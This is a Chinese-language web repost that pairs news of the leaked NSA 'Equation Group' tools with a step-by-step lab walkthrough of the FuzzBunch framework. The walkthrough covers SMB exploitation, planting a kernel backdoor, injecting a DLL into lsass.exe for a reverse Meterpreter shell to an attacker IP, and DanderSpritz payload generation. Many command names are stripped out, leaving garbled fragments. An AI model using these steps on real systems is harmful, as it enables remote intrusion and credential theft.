nsa黑客武器库-NSA武器泄漏引发网络世界“核弹危机”FuzzBunch & DanderSpritz 分析

日前，据称是美国国家安全局（NSA）旗下的“方程式黑客组织”使用的部分网络武器被公开，其中包括可以远程攻破全球约70%机器的漏洞利用工具。360安全卫士官方微博发布红色警报称，经紧急验证这些工具真实有效，360正密切监测和响应此次网络世界的重大灾难级危机。

据了解，这些曝光的文件包含了多个“神洞”的利用工具，不需要用户任何操作，只要联网就可以远程攻击，和多年前的冲击波、震荡波、等蠕虫一样可以瞬间血洗互联网。

NSA武器公开将引发网络世界的腥风血雨。对个人用户来说，木马黑产很可能会改造NSA武器对普通网民发动攻击，制作出类似冲击波的蠕虫大规模传播，此次事件的影响不亚于一场核弹危机。对企业来说，国内大量高校、政府单位、国企以及互联网公司正在使用服务器和办公电脑，漏洞涉及的系统组件也属于企业办公基础服务，如果没有及时应对，企业将面临着被不法分子轻易入侵渗透的风险。

360安全卫士官方微博紧急建议广大网民，临时关闭135、137、445端口和3389远程登录，并注意更新安全产品进行防御nsa黑客武器库，用户还可以使用360安全卫士的“防黑加固”功能降低系统被远程攻击的风险

360企业安全官方微博也向客户也临时发布了解决方案：检查服务器的配置，如果对外的SMB服务器是不必要的，请尽快关闭；对于RDP远程终端服务设置防火墙规则，只允许可信来源IP的访问；对于的IIS 6.0关闭功能。

据分析，NSA这批武器是2012-2013年左右泄露的，且支持对 64位这样小众系统版本的攻击，呈现出非常精细化运作的特点。目前公开的数据仅仅是NSA武器库的冰山一角，360会对这次灾难级网络威胁密切关注并即时响应。（安全牛）

正文：

作者： · 360无线电安全研究部@无线攻防团队

是什么

影子经纪（ ）声称攻破了为NSA开发网络武器的美国黑客团队方程式组织（ Group）黑客组织的计算机系统，并下载了他们大量的攻击工具（包括恶意软件、私有的攻击框架及其它攻击工具）。

方程式组织（ Group）是一个由卡巴斯基实验室发现的尖端网络犯罪组织，后者将其称为世界上最尖端的网络攻击组织之一，同震网（）和火焰（Flame）病毒的制造者紧密合作且在幕后操作。

大招回顾

2016年8月15日：

公布了思科ASA系列防火墙，思科PIX防火墙的漏洞。

2017年4月08日:

公布了针对远程0day漏洞。

2017年4月14日:

公布了针对系统漏洞及利用工具。

下载地址：

2017年4月14日大招分析

目录文件说明：

：包含漏洞、后门、利用工具，等配置文件信息。

swift：包含来自银行攻击的操作说明

：与后门相关的文档

漏洞对应说明

&分析

要使用框架需要注意以下几点

1.将工具放在英文路径下，不能含有中文，目标机防火墙关闭

2.必须.6和对应版本。

3.在利用工具目录下创建目录,看清楚了是利用工具目录,不是c:目录。

4.系统使用32位

.6+下载 链接：密码：o1a1

有点类似于，并且可跨平台，通过fb.py使用，

框架的执行，需要各种配置项

1.目标的IP地址，攻击者的;

2.指示转发选项是否将被使用;

3.指定log日志目录;

4.该项目名称。

在以上的配置中， ip(被攻击机器)IP地址是192.168.69.42, IP(回调地址)也就是运行fb.py框架的IP地址。

配置完成之后,进入下一步,使用help查看帮助命令。

use命令的用途是选择插件，如下所列：

插件被分解成几类：

目标识别和利用漏洞发现：，，，等。;

漏洞利用：，，，等。;

目标攻击后后操作：,,等。

然后我们通过使用使用smb协议来检测对方操作系统版本、架构、可利用的漏洞。

在这个例子中，目标系统似乎有三个漏洞可以利用（，和）,经过这几天的测试,我发现比较稳定,我直接选择使用这个漏洞利用工具。

使用漏洞利用成功之后,会在内核中留一个后门。

通过返回的信息,可以看出攻击成功,用了不到10秒钟的时间，攻击成功之后并不能直接执行命令,需要用框架的其他的插件配合。

攻击成功之后就可以开始使用插件,类似于一个注入器,有以下几个功能。

Ping： 检测后门是否部署成功

：注入dll。

：注入

:用于卸载系统上的后门

在这里我使用来注入dll到目标系统,在注入之前,我打开生成个dll。也可以使用等,注意:msf生成的dll注入到wwin7进程的时候,win7可能会重启。

-/x64//=192.168.38.=8089-fdll>c.dll

打开监听反弹端口

$

msf>/multi/

msf>.168.38.129

msf>

msf>/x64//

msf>

配置来注入dll

注入DLL到Lsass.exe进程,通过控制目标机器。

介绍

是nsa著名的RAT,很多的反病毒厂商都抓到过此RAT的样本,信息收集模块做的特别全。

使用 .py启动,设置好配置信息之后,功能就可以使用。

打开之后我们可在终端进行输入help，进行查看帮助信息。

可用命令的数量比要多一些nsa黑客武器库，我研究此远控的目的是为了能生成dll文件，配合使用，直接反向连接到,我本人不是特别喜欢用,很多的防护设备已经有了的特征,容易发现。还有生成的dll在使用注入到win7的时候,win7会重启。

经过一番查找，发现负责生成有效载荷。

有点类似于。使用命令 -列出可生成dll的选项，来生成一个DLL的马儿，配置信息如下：

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

-

-:

-0)-Quit

-1)-(i386-)

限时特惠:本站持续每日更新海量各大内部创业课程，一年会员仅需要98元，全站资源免费下载
点击查看详情

站长微信:Jiucxh